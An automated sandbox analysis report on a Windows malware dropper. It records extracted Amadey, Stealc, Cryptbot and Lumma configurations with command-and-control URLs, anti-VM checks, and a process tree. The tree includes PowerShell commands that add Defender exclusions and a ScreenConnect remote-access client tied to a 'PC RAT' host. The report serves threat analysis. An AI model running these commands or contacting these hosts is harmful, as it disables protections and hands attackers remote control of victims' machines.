Analysis
-
max time kernel
143s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
19-12-2024 15:11
Static task
static1
Behavioral task
behavioral1
Sample
d8ab74b2a9450c2ca9d269ce168e0b55722852e612b04fc162421497bbcd1e4a.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
d8ab74b2a9450c2ca9d269ce168e0b55722852e612b04fc162421497bbcd1e4a.exe
Resource
win10v2004-20241007-en
General
-
Target
d8ab74b2a9450c2ca9d269ce168e0b55722852e612b04fc162421497bbcd1e4a.exe
-
Size
2.8MB
-
MD5
24b901146bc0e8b0dd5a232218153c82
-
SHA1
ae0b756a87ad4482d474653cb47c1a92adeb84d2
-
SHA256
d8ab74b2a9450c2ca9d269ce168e0b55722852e612b04fc162421497bbcd1e4a
-
SHA512
dcae00cd24bc17825b32a39a737dbda90f0bea019bc356865eec1fb831c8be7cb114bf6913de4c3d17c42f4fcec7e5b4a1bad65a202de41680e58bf4d12e99f4
-
SSDEEP
49152:cBlY2cKSZQlaMrf44mrNVaQ/n+hCAyQ7R2cKnnVqO:WlY2JSZQlaMrA4CfaQ/+mb
Malware Config
Extracted
amadey
4.41
fed3aa
http://185.215.113.16
-
install_dir
44111dbc49
-
install_file
axplong.exe
-
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
-
url_paths
/Jo89Ku7d/index.php
Extracted
stealc
stok
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
cryptbot
Extracted
lumma
Signatures
-
Amadey family
-
Cryptbot family
-
Lumma family
-
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1132 created 1200 1132 2c1cc125de.exe 21 -
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF e208139a0c.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d8ab74b2a9450c2ca9d269ce168e0b55722852e612b04fc162421497bbcd1e4a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6933e84ac3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2c1cc125de.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c64c706c3f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e208139a0c.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 864 powershell.exe 572 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e208139a0c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6933e84ac3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c64c706c3f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c64c706c3f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d8ab74b2a9450c2ca9d269ce168e0b55722852e612b04fc162421497bbcd1e4a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d8ab74b2a9450c2ca9d269ce168e0b55722852e612b04fc162421497bbcd1e4a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2c1cc125de.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6933e84ac3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2c1cc125de.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e208139a0c.exe -
Executes dropped EXE 8 IoCs
pid Process 2916 axplong.exe 1440 6933e84ac3.exe 1132 2c1cc125de.exe 268 c64c706c3f.exe 2696 skotes.exe 992 NN9Dd7c.exe 2224 e208139a0c.exe 1780 ga70pjP.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine d8ab74b2a9450c2ca9d269ce168e0b55722852e612b04fc162421497bbcd1e4a.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine 6933e84ac3.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine 2c1cc125de.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine c64c706c3f.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine e208139a0c.exe -
Loads dropped DLL 21 IoCs
pid Process 2316 d8ab74b2a9450c2ca9d269ce168e0b55722852e612b04fc162421497bbcd1e4a.exe 2316 d8ab74b2a9450c2ca9d269ce168e0b55722852e612b04fc162421497bbcd1e4a.exe 2916 axplong.exe 2916 axplong.exe 2916 axplong.exe 2916 axplong.exe 2916 axplong.exe 268 c64c706c3f.exe 2696 skotes.exe 2916 axplong.exe 2696 skotes.exe 768 MsiExec.exe 1736 rundll32.exe 1736 rundll32.exe 1736 rundll32.exe 1736 rundll32.exe 1736 rundll32.exe 1736 rundll32.exe 1736 rundll32.exe 1736 rundll32.exe 1736 rundll32.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\6933e84ac3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1007452001\\6933e84ac3.exe" axplong.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\c64c706c3f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1007454001\\c64c706c3f.exe" axplong.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 2316 d8ab74b2a9450c2ca9d269ce168e0b55722852e612b04fc162421497bbcd1e4a.exe 2916 axplong.exe 1440 6933e84ac3.exe 1132 2c1cc125de.exe 268 c64c706c3f.exe 2696 skotes.exe 2224 e208139a0c.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\axplong.job d8ab74b2a9450c2ca9d269ce168e0b55722852e612b04fc162421497bbcd1e4a.exe File created C:\Windows\Tasks\skotes.job c64c706c3f.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 15 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e208139a0c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d8ab74b2a9450c2ca9d269ce168e0b55722852e612b04fc162421497bbcd1e4a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language axplong.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c64c706c3f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NN9Dd7c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ga70pjP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6933e84ac3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2c1cc125de.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dialer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe -
Suspicious behavior: EnumeratesProcesses 23 IoCs
pid Process 2316 d8ab74b2a9450c2ca9d269ce168e0b55722852e612b04fc162421497bbcd1e4a.exe 2916 axplong.exe 1440 6933e84ac3.exe 1132 2c1cc125de.exe 1132 2c1cc125de.exe 1132 2c1cc125de.exe 1132 2c1cc125de.exe 1132 2c1cc125de.exe 628 dialer.exe 628 dialer.exe 628 dialer.exe 628 dialer.exe 268 c64c706c3f.exe 2696 skotes.exe 992 NN9Dd7c.exe 864 powershell.exe 572 powershell.exe 2224 e208139a0c.exe 2224 e208139a0c.exe 2224 e208139a0c.exe 2224 e208139a0c.exe 2224 e208139a0c.exe 2224 e208139a0c.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 992 NN9Dd7c.exe Token: SeDebugPrivilege 864 powershell.exe Token: SeDebugPrivilege 572 powershell.exe Token: SeDebugPrivilege 1780 ga70pjP.exe Token: SeShutdownPrivilege 2064 msiexec.exe Token: SeIncreaseQuotaPrivilege 2064 msiexec.exe Token: SeRestorePrivilege 2548 msiexec.exe Token: SeTakeOwnershipPrivilege 2548 msiexec.exe Token: SeSecurityPrivilege 2548 msiexec.exe Token: SeCreateTokenPrivilege 2064 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2064 msiexec.exe Token: SeLockMemoryPrivilege 2064 msiexec.exe Token: SeIncreaseQuotaPrivilege 2064 msiexec.exe Token: SeMachineAccountPrivilege 2064 msiexec.exe Token: SeTcbPrivilege 2064 msiexec.exe Token: SeSecurityPrivilege 2064 msiexec.exe Token: SeTakeOwnershipPrivilege 2064 msiexec.exe Token: SeLoadDriverPrivilege 2064 msiexec.exe Token: SeSystemProfilePrivilege 2064 msiexec.exe Token: SeSystemtimePrivilege 2064 msiexec.exe Token: SeProfSingleProcessPrivilege 2064 msiexec.exe Token: SeIncBasePriorityPrivilege 2064 msiexec.exe Token: SeCreatePagefilePrivilege 2064 msiexec.exe Token: SeCreatePermanentPrivilege 2064 msiexec.exe Token: SeBackupPrivilege 2064 msiexec.exe Token: SeRestorePrivilege 2064 msiexec.exe Token: SeShutdownPrivilege 2064 msiexec.exe Token: SeDebugPrivilege 2064 msiexec.exe Token: SeAuditPrivilege 2064 msiexec.exe Token: SeSystemEnvironmentPrivilege 2064 msiexec.exe Token: SeChangeNotifyPrivilege 2064 msiexec.exe Token: SeRemoteShutdownPrivilege 2064 msiexec.exe Token: SeUndockPrivilege 2064 msiexec.exe Token: SeSyncAgentPrivilege 2064 msiexec.exe Token: SeEnableDelegationPrivilege 2064 msiexec.exe Token: SeManageVolumePrivilege 2064 msiexec.exe Token: SeImpersonatePrivilege 2064 msiexec.exe Token: SeCreateGlobalPrivilege 2064 msiexec.exe Token: SeCreateTokenPrivilege 2064 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2064 msiexec.exe Token: SeLockMemoryPrivilege 2064 msiexec.exe Token: SeIncreaseQuotaPrivilege 2064 msiexec.exe Token: SeMachineAccountPrivilege 2064 msiexec.exe Token: SeTcbPrivilege 2064 msiexec.exe Token: SeSecurityPrivilege 2064 msiexec.exe Token: SeTakeOwnershipPrivilege 2064 msiexec.exe Token: SeLoadDriverPrivilege 2064 msiexec.exe Token: SeSystemProfilePrivilege 2064 msiexec.exe Token: SeSystemtimePrivilege 2064 msiexec.exe Token: SeProfSingleProcessPrivilege 2064 msiexec.exe Token: SeIncBasePriorityPrivilege 2064 msiexec.exe Token: SeCreatePagefilePrivilege 2064 msiexec.exe Token: SeCreatePermanentPrivilege 2064 msiexec.exe Token: SeBackupPrivilege 2064 msiexec.exe Token: SeRestorePrivilege 2064 msiexec.exe Token: SeShutdownPrivilege 2064 msiexec.exe Token: SeDebugPrivilege 2064 msiexec.exe Token: SeAuditPrivilege 2064 msiexec.exe Token: SeSystemEnvironmentPrivilege 2064 msiexec.exe Token: SeChangeNotifyPrivilege 2064 msiexec.exe Token: SeRemoteShutdownPrivilege 2064 msiexec.exe Token: SeUndockPrivilege 2064 msiexec.exe Token: SeSyncAgentPrivilege 2064 msiexec.exe Token: SeEnableDelegationPrivilege 2064 msiexec.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 2316 d8ab74b2a9450c2ca9d269ce168e0b55722852e612b04fc162421497bbcd1e4a.exe 268 c64c706c3f.exe 2064 msiexec.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2316 wrote to memory of 2916 2316 d8ab74b2a9450c2ca9d269ce168e0b55722852e612b04fc162421497bbcd1e4a.exe 30 PID 2316 wrote to memory of 2916 2316 d8ab74b2a9450c2ca9d269ce168e0b55722852e612b04fc162421497bbcd1e4a.exe 30 PID 2316 wrote to memory of 2916 2316 d8ab74b2a9450c2ca9d269ce168e0b55722852e612b04fc162421497bbcd1e4a.exe 30 PID 2316 wrote to memory of 2916 2316 d8ab74b2a9450c2ca9d269ce168e0b55722852e612b04fc162421497bbcd1e4a.exe 30 PID 2916 wrote to memory of 1440 2916 axplong.exe 33 PID 2916 wrote to memory of 1440 2916 axplong.exe 33 PID 2916 wrote to memory of 1440 2916 axplong.exe 33 PID 2916 wrote to memory of 1440 2916 axplong.exe 33 PID 2916 wrote to memory of 1132 2916 axplong.exe 34 PID 2916 wrote to memory of 1132 2916 axplong.exe 34 PID 2916 wrote to memory of 1132 2916 axplong.exe 34 PID 2916 wrote to memory of 1132 2916 axplong.exe 34 PID 1132 wrote to memory of 628 1132 2c1cc125de.exe 35 PID 1132 wrote to memory of 628 1132 2c1cc125de.exe 35 PID 1132 wrote to memory of 628 1132 2c1cc125de.exe 35 PID 1132 wrote to memory of 628 1132 2c1cc125de.exe 35 PID 1132 wrote to memory of 628 1132 2c1cc125de.exe 35 PID 1132 wrote to memory of 628 1132 2c1cc125de.exe 35 PID 2916 wrote to memory of 268 2916 axplong.exe 36 PID 2916 wrote to memory of 268 2916 axplong.exe 36 PID 2916 wrote to memory of 268 2916 axplong.exe 36 PID 2916 wrote to memory of 268 2916 axplong.exe 36 PID 268 wrote to memory of 2696 268 c64c706c3f.exe 37 PID 268 wrote to memory of 2696 268 c64c706c3f.exe 37 PID 268 wrote to memory of 2696 268 c64c706c3f.exe 37 PID 268 wrote to memory of 2696 268 c64c706c3f.exe 37 PID 2696 wrote to memory of 992 2696 skotes.exe 39 PID 2696 wrote to memory of 992 2696 skotes.exe 39 PID 2696 wrote to memory of 992 2696 skotes.exe 39 PID 2696 wrote to memory of 992 2696 skotes.exe 39 PID 992 wrote to memory of 864 992 NN9Dd7c.exe 41 PID 992 wrote to memory of 864 992 NN9Dd7c.exe 41 PID 992 wrote to memory of 864 992 NN9Dd7c.exe 41 PID 992 wrote to memory of 864 992 NN9Dd7c.exe 41 PID 992 wrote to memory of 572 992 NN9Dd7c.exe 43 PID 992 wrote to memory of 572 992 NN9Dd7c.exe 43 PID 992 wrote to memory of 572 992 NN9Dd7c.exe 43 PID 992 wrote to memory of 572 992 NN9Dd7c.exe 43 PID 2916 wrote to memory of 2224 2916 axplong.exe 45 PID 2916 wrote to memory of 2224 2916 axplong.exe 45 PID 2916 wrote to memory of 2224 2916 axplong.exe 45 PID 2916 wrote to memory of 2224 2916 axplong.exe 45 PID 2696 wrote to memory of 1780 2696 skotes.exe 46 PID 2696 wrote to memory of 1780 2696 skotes.exe 46 PID 2696 wrote to memory of 1780 2696 skotes.exe 46 PID 2696 wrote to memory of 1780 2696 skotes.exe 46 PID 1780 wrote to memory of 2064 1780 ga70pjP.exe 47 PID 1780 wrote to memory of 2064 1780 ga70pjP.exe 47 PID 1780 wrote to memory of 2064 1780 ga70pjP.exe 47 PID 1780 wrote to memory of 2064 1780 ga70pjP.exe 47 PID 1780 wrote to memory of 2064 1780 ga70pjP.exe 47 PID 1780 wrote to memory of 2064 1780 ga70pjP.exe 47 PID 1780 wrote to memory of 2064 1780 ga70pjP.exe 47 PID 2548 wrote to memory of 768 2548 msiexec.exe 49 PID 2548 wrote to memory of 768 2548 msiexec.exe 49 PID 2548 wrote to memory of 768 2548 msiexec.exe 49 PID 2548 wrote to memory of 768 2548 msiexec.exe 49 PID 2548 wrote to memory of 768 2548 msiexec.exe 49 PID 2548 wrote to memory of 768 2548 msiexec.exe 49 PID 2548 wrote to memory of 768 2548 msiexec.exe 49 PID 768 wrote to memory of 1736 768 MsiExec.exe 50 PID 768 wrote to memory of 1736 768 MsiExec.exe 50 PID 768 wrote to memory of 1736 768 MsiExec.exe 50 PID 768 wrote to memory of 1736 768 MsiExec.exe 50 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1200
-
C:\Users\Admin\AppData\Local\Temp\d8ab74b2a9450c2ca9d269ce168e0b55722852e612b04fc162421497bbcd1e4a.exe"C:\Users\Admin\AppData\Local\Temp\d8ab74b2a9450c2ca9d269ce168e0b55722852e612b04fc162421497bbcd1e4a.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Users\Admin\AppData\Local\Temp\1007452001\6933e84ac3.exe"C:\Users\Admin\AppData\Local\Temp\1007452001\6933e84ac3.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1440
-
-
C:\Users\Admin\AppData\Local\Temp\1007453001\2c1cc125de.exe"C:\Users\Admin\AppData\Local\Temp\1007453001\2c1cc125de.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1132
-
-
C:\Users\Admin\AppData\Local\Temp\1007454001\c64c706c3f.exe"C:\Users\Admin\AppData\Local\Temp\1007454001\c64c706c3f.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:268 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Users\Admin\AppData\Local\Temp\1017666001\NN9Dd7c.exe"C:\Users\Admin\AppData\Local\Temp\1017666001\NN9Dd7c.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:992 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\vwhlcaze"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:864
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:572
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017680001\ga70pjP.exe"C:\Users\Admin\AppData\Local\Temp\1017680001\ga70pjP.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\98a59bd0eed9222b\ScreenConnect.ClientSetup.msi"7⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2064
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017682001\73eb61abe2.exe"C:\Users\Admin\AppData\Local\Temp\1017682001\73eb61abe2.exe"6⤵PID:1132
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1007455001\e208139a0c.exe"C:\Users\Admin\AppData\Local\Temp\1007455001\e208139a0c.exe"4⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2224
-
-
-
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:628
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DBDF6E7418D054C08699178059E9175E C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:768 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIAB2D.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259566553 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1736
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 89A1A4BB4D8100BAFCAD9FF53281A3712⤵PID:1776
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 5C49BCBD9620B2812246EE8CDCC0EC29 M Global\MSI00002⤵PID:3000
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:2160
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000004A4" "00000000000002A8"1⤵PID:484
-
C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.exe"C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=gips620.top&p=8880&s=3e4d88c4-202e-41be-9b08-0e75984a8eed&k=BgIAAACkAABSU0ExAAgAAAEAAQDpOwIVy34yVx7xLDnH6rBeYx7mmiLN2yQyIYdJTxYIVHOsytxx89D0YKoH68EoEXToTuDpMmwJb%2bhrlJ3faNFTpvu7W8w3%2fxYUdeWuXWg%2bTQxXr6EWby912nykdroWfBxDx6Lmxg1gxGgRJHC8Oc96zV%2fiaqo5GlyagtszKkrbPOWW4FBVQPXhlUfH4mlFE0i0vcMxGginTYl8IjGBzr94ANeAXwajoe9Cjam2haoL%2f%2bgHMtFYBZJisALFnyX3zECpRv7vqWzNAQJYIqY6qDuC2lEbs0NtuBMSfQRW1t0ZOk7cEzuQjq72QbWf1bR8rZf%2b0t3VNSgkIUcBljvpSRK7&c=VIRUS101&c=https%3a%2f%2ft.me%2fvirus101Screenconnect&c=PC%20RAT&c=PC%20RAT&c=&c=&c=&c="1⤵PID:2540
-
C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe" "RunRole" "d44473ef-7f97-4e0d-a903-4426fd1eed4d" "User"2⤵PID:1600
-
-
C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe" "RunRole" "01b0db2c-079b-4725-b55d-cc81e6237c48" "System"2⤵PID:572
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
